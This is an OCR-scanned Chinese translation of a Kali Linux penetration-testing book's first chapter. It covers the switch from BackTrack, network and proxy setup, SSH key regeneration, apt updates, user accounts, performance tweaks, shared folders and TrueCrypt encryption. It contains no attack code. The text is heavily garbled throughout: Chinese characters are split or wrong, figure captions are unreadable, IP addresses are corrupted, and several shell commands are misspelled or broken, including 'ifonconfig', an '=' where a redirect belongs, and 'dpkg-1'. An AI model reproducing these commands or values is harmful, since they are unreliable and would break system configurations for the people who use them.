网络 服务 和 安全 通信 配置 
Kali Eğ 
:Kali 定 制 


:用 第 三 方 应 用 程序 扩展 Kali 的 功能 
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1.1 Kali Linux 


BackTrack (BT) (www.offensive-security.com) 是 一 种 可 扩展 、 多 样 化 的 渗透 测试 和 防御 工具 ， 旨 在 帮助 安全 审计 员 
和 网 络 管理 员 正 确 评估 网 络 安全 。 授 权 和 未 经 授权 的 渗透 测试 人 员 (黑客 ) 都 在 使 用 这 一 工具 


一 从 DO 


2012 年 8 月 ，BackTrack 发 布 了 最 新 版 本 BT 5r3。BT 5r3 版 本 基于 Ubuntu Linux 操 作 系 统 ， 并 且 已 经 被 安全 团体 普遍 采用 
和 支持 。 但 由 于 该 版 本 的 文件 体系 结构 ， 导 致 对 工具 列表 及 其 关联 性 的 管理 变 得 困难 。 


在 BackTrack 中 ， 所 有 渗透 测试 工具 均 放 置 在 /pentest 目 录 下 ， 而 子 目录 /web 或 /database 帮 助 定义 本 地 工具 。 然 而 ， 在 这 
样 的 文件 系统 层次 结构 中 ， 要 寻找 和 执行 任意 工具 并 非 易 事 。 例 如 ， 对 于 sqlninja， 将 其 译 成 SQL 注入 还 是 网 络 漏洞 评估 工具 ， 
或 者 是 网 络 攻 击 工具 还 是 数据 库 开发 工具 ? 


2013 年 3 月 ， 基 于 Debian GNU/Linux 操 作 系 统 的 渗透 测试 新 工具 Kali Linux 取 代 了 BackTrack， 它 使 用 一 种 新 的 平台 体系 
结构 。 


Debian 遵 守 文件 系统 层次 结构 标准 (Filesystem Hierarchy Standard, FHS) ， 对 于 BackTrack， 这 是 Debian 的 一 个 显著 
优点 。 不 需要 浏览 /渗透 测试 树 导航 ， 可 以 从 系统 的 任何 地 方 调用 一 个 工具 ， 因 为 应 用 都 包含 在 系统 路 径 中 ，。 


Kali 包 含 的 其 他 特征 如 下 : 


:支持 多 种 桌面 环境 ， 例 如 Gnome、KDE、LXDE 以 及 XFCE， 也 支持 多 种 语言 。 
: 莱 窑 Debian 的 工具 一 天 至少 和 Debian 资 源 库 同 步 四 次 ， 使 更 新 封装 包 和 支持 安全 修复 更 容易 。 
ge EE i dct eae Teicha et ee an e dec NA we le 


“ARMEL 和 ARMHF' 支 持 ， 人 允许 Kali 安 装 在 Raspberry Pi. ODROID-U2/-X2, WikSamsung Chromebook 这 些 硬 件 上 。 
:包含 超过 300 个 渗透 测试 、 数 据 取证 和 防御 工具 。 它 们 由 内 核 补丁 程序 提供 无 线 支 持 ， 人 允许 一 些 数据 包 注 入 无 线 攻 击 。 
Kali 保留 了 一 个 免费 的 开源 项 目 。 最 重要 的 是 ， 它 得 到 了 活跃 的 在 线 社 区 的 文 持 。 


在 本 书 中 ， 我 们 使 用 64 位 Kali 环 境 下 的 VMware 虚拟 机 (具体 安装 步 又 请 参考 本 书 附录 ) 。 
使 用 VM ， 是 因为 在 其 他 操作 系统 中 很 容易 快速 地 执行 某 些 应 用 ， 例 如 微软 的 Windows 系 统 。 另 外 ，VM 可 以 和 渗透 测试 结 


果 一 起 归档 ， 通 过 评估 档案 ， 来 决定 一 个 特定 的 漏洞 是 否 被 测试 工具 集 检测 到 |。 


Kali 安 妆 完 成 后 ， 用 户 可 以 看 到 系统 默认 的 GUI 的 顶部 菜单 栏 和 一 些 简单 的 图 标 。 通 过 选择 菜单 项 Applications， 然 后 选择 
Kali Linux， 用 户 可 以 访问 菜单 系统 ， 菜 单 系统 包含 前 10 个 安全 工具 (Top 10 Security Tools) 以 及 一 系列 文件 夹 ， 这 些 工具 由 
渗透 测试 期 间 遵循 的 一 般 顺 序 来 排列 ， 如 图 1.1 所 示 。 


b Accessories 
2j Electronics > 
2s Graphics 》 
Internet 

EROR ) hi Top 10 Security Tools » 
i] Office 3 
f Programming y 
Sound & Video H 


QO Information Gathering » 
fig Vulnerability Analysis ， 


Web Applications d off CMS Identification 


i Syston Tents | u^ Password Attacks : pr^ Database Exploitation 
] Wireless Attacks 20 IDS/IPS Identification 
G4 Exploitation Tools : $o Web Application Fuzzers 
Tri Sniffing/Spoofing } pe Web Application Proxies 
n Maintaining Access *o Web Crawlers 
= Reverse Engineering | oo Web Vulnerability Scanners 


Lj - 
r*3 stress Testing 


已 Hardware Hacking 


pai 
Th Forensics 


zl Reporting Tools 
T System Services 


图 1.1 Kali Linux 启 动 菜单 


Sear 573 用 户 应 熟悉 这 个 菜单 。 然 而 ， 也 存在 一 些 改变 ， 包 括 简化 了 的 网 络 服务 和 通信 访问 ， 


1.2 ”配置 网 络 服务 和 安全 通信 


使 用 Kali 的 第 一 步 是 确保 其 连接 到 有 绪 网 络 或 者 无 线 网 络 ， 用 来 文 持 更 新 和 用 户 目 定义 。 


你 或 许 需要 通过 动态 主机 配置 协议 (Dynamic Host Configuration Protocol, DHCP) 得 到 IP 地 址 ， 或 者 静 
先 ， 在 终 辛 窗口 中 ， 用 命令 ifconfig 来 确认 你 的 IP 地 址 ， 如 图 1.2 所 示 。 


Bo. Ei 


rootükali:-* ifconfig 
athü Link encap:Ethernet  Hwaddr 038:0c:29:56:04d:08 
inet addr:192.1568.204.137  Bcast:182.168.204.255 3 Màask:255,.755.255.0 
inet6 addr: feB0::20c:29ff:fe56:d08/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST  MTU:15808 Metric:1 
RX packets:631852 errors:O dropped:6 overruns:O frame:G 
TX packets:359462 errors:O dropped:@ overruns:8 carrier: 
collisions:8 txqueuelen:18080 
RX bytes:873309953 (832.8 MiB) TX bytes:38805419 (37.0 MiB) 


lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING  MTU:65536 Metric:1 

RX packets:157544 errors:0 dropped:O overruns:O frame: 
TX packets:15/544 errors:0 dropped:O overruns:Ga carrier:G 
collisions:8O txqueuelen:G 

RX bytes:37806955 (36.0 MiB) 


TX bytes:3/866955 (36.6 MiB) 


图 1.2 ”使 用 ifconfig 命 令 确 认 IP 地 址 


在 这 个 特殊 情况 下 ，VM 被 分 配 到 iP 地 址 192.168.204.132。 如 果 没 有 获得 IP 地 址 ， 可 以 通过 命令 dhclient eth0 (或 者 其 他 
可 用 的 、 依 靠 系 统 特 定 配置 的 端口 ) 使 用 DHCP 来 分 配 地 址 。 


如 果 一 个 静态 |P 地 址 被 使 用 了 ， 那 么 殉 需 要 添加 信息 。 例 如 ， 通 过 如 下 代码 可 以 分 配 一 个 静态 的 I|P 地 址 192.168.204.128: 


host IP address: 192.168.204.128 
subnet mask: 255.255.255.0 

default gateway: 192.168.204.1 

DNS server: 192.168.204.10 


打开 终端 窗口 并 输入 以 下 命令 : 


root@kali:~#  ifonconfig eth0 192.168.204.128/24 
root@kali:-~# route add default gw 192.168.204.1 


root@kali:~# echo nameserver 192.168.204.10 = /etc/resolv.conf 


这 时 的 IP 设 置 是 非 持续 的 ， 当 Kali 重 新 启动 时 ， 设 置 的 |P 会 恢复 原 有 状态 。 为 了 使 配置 永久 保持 ， 需 要 编 
辑 /etc/network/interfaces 文 件 ， 如 图 1.3 所 示 。 


Original 


puto lo 


iface lo inet Loopback | 


auto eth6 
iface eth@ inet dhcp 


auto ethl 
iface ethl inet dhcp 


auto eth2 
iface eth2 inet dhcp 


auto athe 
iface ath8 inet dhcp 


auto wlano 
iface wlan8 inet dhcp 


Edited 


auto lo 
iface lo inet loopback 


# primary network interface 
& edited to maintain persistent state 
auto ethà 
iface eth inet static 
address 192.168.264.128 
netmask 255.255.255.8 
network 192.168.284.8 
broadcast 192.168.204.255 
gateway 192.168.204. 1| 


auto ethl 
iface ethl inet dhcp 


auto eth2 
iface eth2 inet dhcp 


auto athe 
iface ath inet dhcp 


编辑 IP 地 址 


默认 情况 下 ，Kali 启 动 时 没有 激活 DHCP 服 务 。 先 声明 新 的 网 络 |P 地 址 ， 这 样 可 能 警告 管理 员 : 存在 测试 人 员 。 对 一 些 测试 
实例 ， 这 不 仅仅 不 是 问题 ， 而 且 还 有 利于 在 启动 期 间 自动 开启 一 些 服务 。 可 以 通过 输入 以 下 命令 来 实现 


root@kali-~# update-rc.d networking defaults 


root@kali~# /etc/init.d/networking restart 


Kali 安 六 时 丈 包 售 了 网 络 服务 ， 且 它 可 以 在 需要 时 开局 或 关闭， 包括 DHCP、HTTP、SSH、TFTP 以 及 VNC 服 务 器 。 这 些 服 


务 通常 由 命令 行 来 调用 ， 但 其 中 一 些 也 可 以 通过 Kali 菜 单项 来 访问 。 


1.2.1 调整 网 络 代 理 设置 


用 户 分 为 经 过 验证 的 ， 或 者 未 经 过 验证 的 。 连 接 时 必须 更 改 bash.bashrc 和 apt.conf。 这 两 个 文件 都 在 /root/etc 目 录 中 。 


1. 编 辑 bash.bashrc 文 件 ， 如 图 1.4 所 示 ， 用 文本 编辑 器 打开 文件 ， 并 添加 以 下 内 容 到 bash.bashrc 文 件 底 部 : 


export ftp proxy="ftp://user:password@proxyIP:port" 


export http proxy="http://user:password@proxyIP:port" 


export https proxy-"https://user:passwordGproxyIP:port" 


export socks proxy="https://user:password@proxyIP:port" 


*bash.bashrc (/etc) - gedit 


— i fe) c j FA I -- i 


zm aaa ———— l 


Cmeshbashr 38| O 


i$ if the command-not-found package is installed, use it 
if [ -x /usr/lib/command-not-found -o -x /usr/share/command-not-found |; then 
function command not found handle 1 
# check because c-n-f could've been removed in the meantime 
if [ -x /usr/lib/command-not-found |; then 
/usr/bin/python /usr/lib/command-not-found -- $1 
return $? 
elif [ -x /usr/share/command-not-found ]; then 
/usr/bin/python /usr/share/command-not-found -- $1 
return $? 
else 
return 127 
fi 
} 
ifi 
[export ftp proxy="Ttp: //user: password@proxyIP: port" 
[export http proxy="http://user: password@proxyIP: port" 
‘export https proxy="https://user:password@proxyIP: port" 
lexport socks proxy="https|: //user: password@proxyIP: port" 


Plain Text v | Tab Width: 8 v | Ln 67, Col 26 INS 4 


图 1.4 25 £t bash.bashrc X4} 


2. 分 别 用 你 的 代理 IP 地 址 和 端口 号 代替 proxylIP 和 port， 然 后 用 你 的 验证 用 户 名 和 密码 代替 用 户 名 和 密码 。 如 果 不 需要 验 
证 ， 那 么 只 需要 写 @ 符 号 后 面 的 部 分 。 


3. 在 同一 个 目录 中 ， 创 建 apt.conf 文 件 ， 输 入 下 面 的 命令 行 ， 如 图 1.5 所 示 。 


“< *apt.conf (/etc/apt) - gedit 


pP E | 
| *bash.bashrc € L *a pt.conf x 

lAcquire::ftp::proxy "ftp://user:password@proxyIP:port/"; 
Acquire: :http: :proxy "http: //user:passwordaproxyIP:port/" ; 
Acquire::https::proxy "https://user:passwordaproxyIP:port/" ; 
Acquire::socks::proxy "https://user:passwordaproxyIP: port/" ; 


-— Es 
= 
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图 1.5 ”编辑 apt.conf 文 件 
4. 保 仔 并 关闭 文件 。 注 销 后 重新 登录 以 激活 新 的 配置 。 
1.2.2 ”使 用 安全 Shell 保 护 通 信安 全 


在 测试 过 程 中 ， 为 了 最 小 化 被 目标 网 络 检测 到 的 可 能 ，Kali 不 用 任何 外 部 监听 网 络 服务 。 一 些 服务 已 经 安装 ， 例 如 安全 
Shell (SSH, Secure Shell) 。 自 然 ， 必 须 优 先 使 用 它们 。 


Kali 用 默认 的 SSH 密 钥 进 行 预 配置 。 在 开局 SSH 服 务 前 ， 禁 用 默认 密 钥 ， 并 生成 一 个 唯一 的 密 钥 集 以 供 使 用 。 


将 默认 的 SSH 密 钥 移 动 到 备份 文件 夹 ， 然 后 通过 下 列 命令 生成 一 个 新 的 SSH 密 钥 集 : 
dpkg-reconfigure openssh-server 


移动 原始 密 钥 和 生成 新 密 钥 集 的 过 程 是 公开 的 ， 如 图 1.6 所 示 。 


root@kali:~# cd /etc/ssh/ 


root(kaLi:/: # mkdir keys default 
root(kali: # mv ssh host * keys default 
root(kali: # dpkg-reconfigure openssh-server 


Creating SSH2 RSA key; this may take some time . 
Creating 5SH2 DSA key; this may take some time . 
Creating SSH2 ECDSA key; this may take some time ... 
insserv: warning: current start runlevel{s) (empty) of script ‘ssh’ overrides LS 
BH defaults (2 3 4 5). 
insserv: warning: current stop runlevel(s) (23 4 5) of script 'ssh' overrides L 
SB defaults (empty). 
# 


1 = a 
root iA d 1 l: 


图 1.6 a BA 
为 了 验证 新 生成 的 密 钥 是 唯一 的 ， 计 算 它 们 的 哈 希 值 nd5sum ， 然 后 和 原始 密 钥 进行 比较 ， 如 图 1.7 所 示 。 


要 用 菜单 项 来 开启 SSH 服 务 ， 依 次 选择 Applications|Kali Linux|System Services|SSHD|SSHD Start, 


用 命令 行 启 动 SSH 服 务 ， 如 图 1.8 所 示 。 


rootükal1: 
3bdee827a57 f üü fOdbB89aO0bb4Ob9f5el 
fbedb4A/dob5z0566c8024/ab5abaol2T/009 
]3f89e458b8SOdbclcbeS82245366880c27/ 
/cácad1220029cb5594a3s80bS95213T583 
/T3bb5caeablasbt/ /659a4d69d5de46 
d/9asbc /00aS98el3b//aeeb5eae/310890 
root(ükaL1i: 
root(dka Li! 
flal5T49aac /5c atl Tedadb5s0ivec laf 
Líld8S/eez2830/[bobaS84285/adaaeesl4 
lose]G/lcfo65eBGOc5T6bdSabo5b53b4ef 
f8B0c3fOb/GOScdadedc5ela3dle08325a 
z4d5ebal3sdde6ce4daSdelbcb5/9/8/b4l1989 
eabloafZdbedlb5251T458824258bB8&81/bS 
root(ükali: | 


sg 


其 mdbesum ssh _ host * 


ssh host dsa kay 

ssh host dsa key. pub 
ssh host ecdsa key 

ssh host ecdsa key.pub 
ssh host rsa key 

ssh host rsa key.pub 


& cd keys default/ 
€ mdosum * 


ssh host dsa key 

ssh Hosl dsa key.pub 
ssh host ecdsa key 

ssh host ecdsa key.pub 
ssh host rsa key 

ssh host rsa key.pub 


图 1.7 ?FJEmd5sum 5 JR 45 58 91 EAT HERR 


iotükali:-X /etc/init.d/ssh start 
[ ok ] Starting OpenBSD Secure Shell server: sshd. 
rootfikaLli: ~# 

图 1.8 用 命令 行 启动 SSH 服 务 

为 了 验证 SSH 正 在 运行 ， 执 行 一 个 netstat 查 询 ， 如 图 1.9 所 示 。 
root@kali:-# natstat -antp 
Active Internet connections (servers and establishad) 
Proto Recv-Q Send-Q Local Address Foreign Address State 
PID/Program name 
tcp G 0 8.6.0.0:22 0.0.0.3:* LISTEN 


1987B83/sshda | 


图 1.9 ”运行 hpetstat 检 查 SSH 运 行 状态 
在 先前 的 例子 中 ，SSH 的 守护 进程 正在 监听 22 号 亲口 。 使 用 如 下 命令 行 终 I 上 SSH: 


/etc/init.d/ssh stop 


13 ”更 新 Kali Linux 


Kali 必 须 定期 打 补 丁 ， 确 保 基 本 的 操作 系统 和 应 用 是 最 新 的 ， 同 时 更 新 了 安全 补丁 。 


Debian 软 件 包 管理 系统 


Debian 的 软件 包 管 理 系统 是 一 个 独立 绑 定 的 应 用 ， 叫 作 软件 包 (packages) 。 在 目 定义 环境 中 ， 用 户 可 以 安 疼 或 者 移 除 软 
件 包 ， 软 件 包 也 支持 一 些 任务 ， 例 如 渗透 测试 。 它 们 也 可 以 扩展 Kali 的 一 些 功 能 ,支持 一 些 任务 ,例如 通信 (Skype, BRITA 
息 、 安 全 邮件 等 ) 或 者 编辑 文档 (在 Wine 环 境 下 运行 的 OpenOffice 和 Microsoft Office) 。 


软件 包 存 储 在 资源 库 中 ， 用 户 下 载 到 自己 的 系统 中 ， 以 此 确保 软件 包 是 完整 的 。 


默认 情况 下 ，Kali 只 使 用 官方 的 Kali 资 源 库 。 不 完整 的 安 妆 进程 可 能 不 能 把 资源 库 添 加 到 正确 的 source.list 文 件 ， 或 者 当 有 
新 的 应 用 添加 时 ， 你 可 能 希望 扩展 可 用 的 资源 库 。 


用 命令 行 来 更 新 Source.list 文 件 (echo deb http://http.kali.org/kiali kali main contrib non- 
free>>/etc/apt/sources.list) ， 或 者 用 一 个 文本 编辑 器 来 更 新 。 


默认 程序 包 人 资源 库 在 目录 /etc/apt/sources.list 中 ， 如 下 所 示 ; 如 果 不 仔 企 ， 编 辑 sources.list 文 件 ， 增 加 它们 。 


## Kali 
deb http://http.kali.org/kali kali main contrib non-free 
## Kali-dev 
deb http://http.kali.org/kali kali-dev main contrib non-free 
## Kali Security updates 
deb http://security.kali.org/kali-security kali/updates main 
contrib non-free 


官方 工具 资源 库 中 并 不 包含 所 有 的 Kali 工 具 。 如 果 你 选择 手动 更 新 一 个 工具 ， 那 么 你 有 可 能 重 写 现 有 的 软件 包 文 件 ， 并 破坏 
依赖 性 。 因 此 ， 存 在 一 些 没 正式 地 移入 Debian 资 源 库 中 的 工具 ， 例 如 aircrack-ng、dnsrecon、sqlmap、beef-xss 等 ， 以 及 社 
交工 程 工 具 包 (Social Engineering Toolkit) ， 这 些 工 具 由 Bleeding Edge 资 源 库 维护 。 用 下 面 的 命令 行将 资源 库 添 加 到 


sources.list}: 


## Bleeding Edge repository 
deb http://repo.kali.org/kali kali kali-bleeding-edge main 


dpkg 


dpkg 是 Debian 的 软件 包 管理 系 统 。 这 里 使 用 命令 行 来 安装 、 移 除 和 查询 软件 包 。 一 般 来 说 ，dpkg 在 独立 的 软件 包 上 执行 


二 dpkg 在 编译 安装 的 应 用 列表 时 特别 有 用 ， 命 令 是 dpkg-1>1ist .txt。 如 果 你 想 知道 一 个 特定 工具 是 否 已 安装 ， 可 输入 命 
令 dpkg-l|grep<tool name>. 


图 1.10 表 明 ， 当 调用 dpkg-1 时 ， 引 用 了 返回 数据 ， 并 提供 了 安装 在 Kali 版 本 上 的 应 用 列表 ; 这 对 于 识别 应 用 特别 有 用 ， 应 
用 只 能 用 命令 行 来 直接 访问 。 


root(k -+ dpkg -Ll 

Jesired= Unknown/Ins tall/Remove/Purge/Hold 

| diu ue DATE CON Ti kam pene ees A HORE Eug es A 
|/ Err?-(none)/Reinst-required (Status,Err: uppercase-bady| 


||“ Name Version Architecture Description 

+ 十 十 -一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 - 一 一 一 一 一 一 一 一 一 一 一 一 - 二 三 二 二 二 二 二 二 二 二 二 二 -二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 
ii acccheck 0.2.1-1kali3 amd64 Password dictionary attack tool for 

ii accountsservice @.6.71-8 andb4 query and manipulate user account in 
li  ace-voip 1.13-lkali4 amdb4 A simple VoIP corporate directory en 
ii acl 2.20.51 °8 andes Access control list utilities 

ii  adduser 3.1134nmu3 all add and remove users and groups 

ii afflib-tools 3./.l-Okali3 amde4 support for Advanced Forensics forma 
Li  aircrack-ng 1.2—-svn2256- amdĝ4 An 802.11 WEP and WPA-PSK key cracki 


图 1.10 ”使 用 dpkg-1 命 令 
使 用 高 级 软件 包工 具 


高 级 软件 包工 具 (Advanced Packaging Tool, APT) ， 通 过 搜索 资源 库 、 安 妆 或 者 升级 的 软件 包 ， 以 及 所 有 需要 的 依赖 
来 扩展 dkpg 的 功能 。APT 也 可 以 用 来 升级 完整 的 版 本 。 


一 
~ 


最 常用 的 apt 命 令 如 下 : 


‘apt-get update: Ala nir UN EE 引文 件 和 它们 定义 在 /etc/apt/sources.1list 目 录 下 的 资源 。 在 执行 一 个 upgrade 
或 者 dist-upgrade 命 令 前 ， 始 终 应 该 首先 使 用 update 命 令 。 


apt-get upgrade: 用 来 安装 软件 包 的 最 新 版 本 ， 这 些 软件 包 使 用 /etc/apt/sources .1list 安 装 在 系统 上 。 升 级 安装 在 Kali 上 的 有 最 新 
版 本 的 软件 包 ，。 升级 命令 不 会 改变 或 者 删除 没有 升级 的 软件 包 ， 也 不 会 安装 已 有 的 软件 包 。 


‘apt-get dist-upgrade: 该 命令 升级 现 所 有 安装 在 系统 和 相关 位 置 的 软件 包 。 命 令 也 可 从 系统 上 移 除 淘汰 的 软件 包 。 


命令 apt-get 可 以 全 面 摘 述 一 个 软件 包 ， 并 标识 包 的 依赖 性 (apt-cache show<package name>) 或 者 移 除 一 个 软件 包 


(apt-get remove<package name>) 。 


和 在 启动 阶段 ， 通 过 执行 apt_get update 命令 和 upgrade 命 令 来 确保 你 的 全 会 话 正在 使 用 最 新 的 工具 。 完 成 任务 最 简单 的 方法 是 创建 一 个 
update. sh 脚本 ， 这 个 脚本 包含 以 下 命令 行 : 


apt-get update&&apt-get upgrade-y&&apt-get distupgrade-y 

一 些 应 用 不 通过 apt-get 命 令 来 升级 。 例 如 ，exploit-db 和 存档 文件 的 本 地 副本 必须 手动 升级 。 创 建 一 个 update.sh 脚 本 ， 并 
添加 下 列 命 令 行 ， 使 其 目 动 执行 升级 : 

cd /usr/share/exploitdb 

wget http://www.exploit-db.com/archive.tar.bz2 


tar -xvjf archive.tar.bz2 


rm archive.tar.bz2 


1.4 配置 和 目 定 义 Kali Linux 


Kali 是 一 个 用 来 完成 渗透 测试 的 框架 。 然 而 ,测试 人 员 不 会 感 完 到 相关 联 的 默认 安装 的 测试 工具 ， 或 者 是 使 用 Kali 桌 面 安 闪 
的 工具 。 通 过 目 定 义 BackTrack， 测 试 人 员 可 以 提高 收集 到 的 客户 数据 的 安全 性 ， 使 渗透 测试 更 简单 。 


Kali 的 常见 目 定义 包括 : 


XECEDER ZH JP ER 

添加 普通 用 户 

:加 速 Kali 运 行 

:与 Microsoft Windows 共 享 文件 夹 


创建 加 密 文件 夹 
14.1 ” 重 置 超级 用 户 密 码 
使 用 以 下 命令 修改 用 尸 密码 
passwd root 


然后 会 提示 你 输入 一 个 新 的 密码 ， 如 图 1.11 所 示 。 


rootükali:-4 passwd root 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 
root(kal L: # 


图 1.11 修改 用 户 密 码 


1.4.2 ”添加 普通 用 户 


为 了 执行 其 功能 ，Kali 提 供 的 许多 应 用 必须 用 超级 用 户 的 权限 (Root-level privileges) 运行 。 直 级 用 户 权限 有 一 定 的 风 
险 ， 例如， 输 错 一 个 命令 或 者 使 用 了 一 个 错误 的 命令 ， 将 会 导致 应 用 终止 ， 甚 至 损害 被 测试 的 系统 。 在 一 些 例子 中 ， 使 用 普通 用 
户 级 权限 来 测试 是 更 可 取 的 。 事 实 上 ， 一 些 应 用 促进 了 低 权限 账户 的 使 用 。 


为 了 创建 一 个 普通 用 户 ， 可 以 简单 地 在 终 背 上 使 用 命令 adduser， 接 着 会 出 现 指令 ， 如 图 1.12 所 示 。 


root(l € adduser noroot 

Adding user  noroot' 

Adding new group noroot' (1001) 

Adding new user 'noroot' (1001) with group  noroot' 

Creating home directory '^/home/noroot' 

Copying files from ^ /etc/skel' 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 

Changing the user information for noroot 

Enter the new value, or press ENTER for the default 
FULL Name []: rwbeggs 
Room Number [1]: 
Work Phone []: 
Home Phone []: 
Uthar EJ; 

Is the information correct? [Y/n] y 


| | m 
amore 311" 
| 2 118," t | | 

bL oe Ee T "mm cmm 国 


: ru i = 
b T IDE TE 


| 
| 
| 


图 1.12 ”创建 普通 用 户 
1.4.3 加速 Kali 运 行 


以 下 几 个 工具 可 以 用 来 优化 和 加 速 Kali 运 行 : 


.在 使 用 虚拟 机 时 ， 安 装 VM 软 件 驱 动 包 Guest Additions (VirtualBox) 或 者 VMware Tools (VMware) 。 
.在 创建 虚拟 机 时 ， 选 择 一 个 固定 大 小 的 磁盘 ， 而 不 是 动态 分 配 的 磁盘 。 固 定 大 小 的 磁盘 可 以 更 快 地 添加 文件 ， 并 且 碎 片 更 少 。 


-预先 加 载 的 应 用 (apt-get install preload) 能 识别 一 个 用 户 最 第 用 的 程序 ， 也 能 把 二 进 制 文件 和 依赖 性 预先 加 载 到 内 存 ， 以 提供 更 快 
速 的 访问 。 随 着 安装 后 的 第 一 次 重启 ， 它 会 自动 运行 。 


‘BleachBit (apt-get install bleachbit) 释放 磁盘 空间 ， 通 过 释放 绥 仔 、 删 除 cookie、 清 除 上 网 记录 、 粉 碎 临时 文件 、 删 除 日 志 ， 
- 些 非 必需 的 文件 来 提高 隐私 性 。 使 用 高 级 技术 ， 包 括 粉 碎 文件 来 防止 恢复 ， 探 除 空 亲 破 盘 空 间 来 隐藏 没 有 完全 删除 的 文件 的 踩 


在 默认 情况 下 ，Kali 不 会 显示 所 有 出 现在 开始 荣 单 里 的 应 用 。 每 个 在 启动 阶段 安装 的 应 用 降低 了 系统 数据 ， 并 且 可 能 会 影响 内 存 使 用 和 系统 
性 能 。 用 局 动 管理 右 BUM (Boot Up Manager) 来 禁止 启动 时 非 必 要 的 服务 和 应 用 Capt-get install bum) ， 如 图 1.13 所 示 。 


* Boot-Up Manager 


reac HB 


Metasploit Exploitation Framework 
metasploit-postgres 


wired and wireless network manager - daemon 


Wicd i 

2 Fast remote file copy program y 
Isy nc 

P" New generation audio server y 
pulseaudio | | 
Restores DNS be 

» pppd-dns ? | 

E Configures your system for internet access via a modem = 
dns-clean | 

afl ! E E ? 
framework: postgres 

z New generation Web Server y | 

| apache? \ 

| graphical boot animation and logger - main package i 

E plymouth-log " 

一 NFS support files common to client and server a CU 

= idmapd j 

= clients and daemons for the Network Information Service (NI5) 3 

-~ yooasswdd : 
RPC port mapper " 
portmap-hboot : 

— Manages your Internet connection a: 

= etworking 

— Allows users securely to log into the machine remotely ə 
ssh | | 

, Delivers messages between applications > 

= dbus 

— Tool to report program crashes = 

本 apport 7 


| Apply. [| Advanced | Quit | 


图 1.13 Æ JABUM 


.直接 从 键盘 添加 gnome-qo (apt-get install gnome-do) 启动 应 用 。 从 应 用 | 附件 (Applications |Accessories) 菜单 中 选择 
gnome-dqo 配 置 它 。 一 旦 局 动 后 ， 选 择 首 选项 (Preferences) KA, Banas) (Quiet Launch) 功能 ， 并 选择 一 个 启动 命令 〈 例 
W, Ctrl+Shift) 。 选 好 局 动 密 钥 后 ， 清 除 现 有 的 命令 ， 然 后 输入 需要 执行 的 命令 行 。 


如 果 不 从 键盘 直接 启动 ， 那 么 可 能 会 写 入 一 些 能 局 动 复杂 操作 的 特定 脚本 语句 。 


1.4.4 与 Microsoft Windows 共 享 文件 夹 


Kali 工 具 集 能 灵活 地 与 驻 留 在 不 同 操作 系统 上 的 应 用 共享 成 果 ， 特 别 是 Microsoft Windows。 最 有 效 的 数据 共享 方式 是 创建 
从 主机 操作 系统 以 及 Kali Linux VM 客 尸 机 能 访问 的 一 个 文件 夹 。 


当 将 主机 或 VM 中 的 数据 放置 在 共享 文件 夹 中 时 ， 所 有 能 访问 共享 文件 夹 的 系统 都 能 立刻 访问 数据 。 


创建 共享 文件 夹 的 步骤 如 下 : 

1. 在 主机 操作 系统 上 建立 一 个 文件 夹 。 在 这 个 例子 中 ， 我 们 将 其 命名 为 Kali Share. 

2. 石 击 文件 来 ， 选 择 共享 (Sharing) 选项 卡 ， 并 从 中 选择 Share。 

3. 确 保 文 件 是 与 每 个 人 (Everyone) 共享 的 ， 允 许 级 别 (Permission Level) 设置 为 读 / 写 (Read/Write) 。 


4. 如 果 你 没有 这 样 操作 ， 那 么 在 BackTrack 上 安装 适当 的 工具 。 例 如 ， 在 使 用 VMware 时 ， 安 装 VMware 工 具 (具体 安装 步 
骤 可 参考 本 书 附录 ) 。 


5. 在 完成 安装 之 后 ， 在 VMware 菜单 里 选择 虚拟 机 设置 (Virtual Machine Setting) 。 找 到 共享 文件 夹 (Shared 
Folders) 菜单 ， 并 选择 保持 打开 (Always Enabled) 选项 。 创 建 主机 操作 系统 中 已 存在 的 共享 文件 夹 的 路 径 ， 如 图 1.14 所 示 。 


Virtual Machine Settings = 


| ih Shared folders expose your files to programs in the 
BacTrack 了 3 由 virtual machine. This may put your computer and 
your data at risk. Only enable shared folders if you 
trust the virtual machine with your data. 


@ Always enabled 
©) Enabled until next power off or suspend 


-Folders — - 


Name Host Path | 
i BT Shared C:Wsersywbegg Deskto... 


图 1.14 虚拟 机 设置 界面 
和 ~ 虽然 VirtualBox 使 用 不 同 的 菜单 名 ， 但 过 程 是 一 样 的 。 
6. 打 开 Kali 昌 面 上 的 文件 浏览 器 。 可 以 在 mnt 文 件 夹 中 找到 共享 文件 夹 (也 有 可 能 在 子 文 件 夹 hgfs 中 找到 ) 。 


7. 将 文件 夹 拖 到 Kali 介 面 上 ， 这 样 束 创建 了 一 个 到 真实 文件 夹 的 链接 。 


8. 在 主机 操作 系统 中 ， 具 有 相同 名 字 的 文件 夹 中 的 所 有 内 容 都 可 以 被 访问 ， 反 之 亦 然 。 
共享 文件 中 ， 将 包含 一 次 渗透 测试 中 的 敏感 数据 ， 所 以 需要 通过 加 密 来 保护 用 尸 网 络 ， 在 数据 丢失 时 ， 减 轻 测 试 人 员 的 责 
f£. 


1.4.5 ”用 TrueCrypt 创 建 加 密 文件 夹 


在 进行 一 次 渗透 测试 时 ， 你 将 会 访问 到 敏感 客户 信息 ， 包 括 可 利用 的 漏洞 ， 你 也 会 得 到 一 综 毁 坏 数据 的 副本 。 确 保 这 些 信息 
的 安全 是 测试 人 员 的 法 律 责任 和 道德 责任 。 承 担 这 些 责任 的 最 好 方法 是 在 仓储 和 传输 过 程 中 ， 确 保 加 密 所 有 的 客户 信息 。 


根据 以 下 步骤 ， 在 BackTrack 上 安装 TrueCrypt: 
1. 在 应 用 (Applications) 菜单 中 ， 选 择 Accessories|TrueCrypt 选 项 。 


2. 打 开 上 述 应 用 创建 加 密 文件 夹 。 你 可 以 看 到 主 菜单 ， 如 图 1.15 所 示 。 


* TrueCrypt 


Volume Size Mount Directory Type 


一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 KK 
| 


Volume 


. Select File... 


Select Device... 


Dismount All j| Exit | 


图 1.15 TrueCrypt X. 3X #% 


